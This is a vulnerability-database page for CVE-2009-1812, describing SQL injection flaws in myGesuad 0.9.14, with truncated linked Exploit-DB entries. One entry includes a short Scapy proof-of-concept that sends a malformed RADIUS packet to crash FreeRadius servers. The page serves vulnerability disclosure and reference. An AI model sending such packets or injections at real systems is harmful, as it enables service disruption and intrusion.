CVE-2009-1812
published 2009-05-29CVE-2009-1812: Multiple SQL injection vulnerabilities in myGesuad 0.9.14 (aka 0.9) allow remote attackers to execute arbitrary SQL commands via (1) the formUser parameter…
PriorityP434medium6CVSS 2.0
AVNACMAuSCPIPAP
EXPLOIT
EPSS
0.89%
54.7th percentile
Multiple SQL injection vulnerabilities in myGesuad 0.9.14 (aka 0.9) allow remote attackers to execute arbitrary SQL commands via (1) the formUser parameter (aka the Name field) to common/login.php, and allow remote authenticated users to execute arbitrary SQL commands via the ID parameter in a Detail action to (2) kategorie.php, (3) budget.php, (4) zahlung.php, or (5) adresse.php in modules/, related to classes/class.perform.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| collector | mygesuad | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WinRadius Server 2009 - Denial of Service
exploitdb·2012-05-29
CVE-2012-3816 WinRadius Server 2009 - Denial of Service
WinRadius Server 2009 - Denial of Service
---
Title: WinRadius Server Denial Of Service Vulnerability
Software : WinRadius
Software Version : v2009
Vendor: http://www.elite-school.com/saas/WinRadius/
Vulnerability Published : 2012-05-27
Vulnerability Update Time :
Status :
Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)
Bug Description :
WinRadius is a standard RADIUS server for network authentication, accounting. It's easy to use, and can be used for telecommunication accounting platform, PPP authentication, accounting server. It support PPP, PPPoE, PPTP, VPN, VoIP, ADSL, Cable Modem, CDMA, GSM, GPRS, WLAN(802.1x), etc.
WinRadius server would bind udp port 1812 and 1813, but it does not validate the password option size leading to a Denial Of Service flaw while send
Exploit-DB
FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service
exploitdb·2009-09-11
CVE-2009-3111 FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service
FreeRadius \n"
sys.exit(1)
PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \
RadiusAttr(type=69,value="",len=2)
send(PoD)
# milw0rm.com [2009-09-11]
Exploit-DB
my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting
exploitdb·2009-05-15
CVE-2009-1826 my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting
my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting
---
** **
** **
** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
[> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> WEB: http://www.collector.ch/drupal5/index.php |
|-->DOWNLOAD: http://www.collector.ch/drupal5/?q=node/11 |
|-->DEMO: http://www.collector.ch/drupal5/?q=node/10 |
|-->CATEGORY: Management |
|-->DESCRIP
No writeups or analysis indexed.
http://secunia.com/advisories/35110http://www.collector.ch/drupal5/?q=node/39http://www.securityfocus.com/bid/34998http://www.vupen.com/english/advisories/2009/1345https://www.exploit-db.com/exploits/8708http://secunia.com/advisories/35110http://www.collector.ch/drupal5/?q=node/39http://www.securityfocus.com/bid/34998http://www.vupen.com/english/advisories/2009/1345https://www.exploit-db.com/exploits/8708
2009-05-29
Published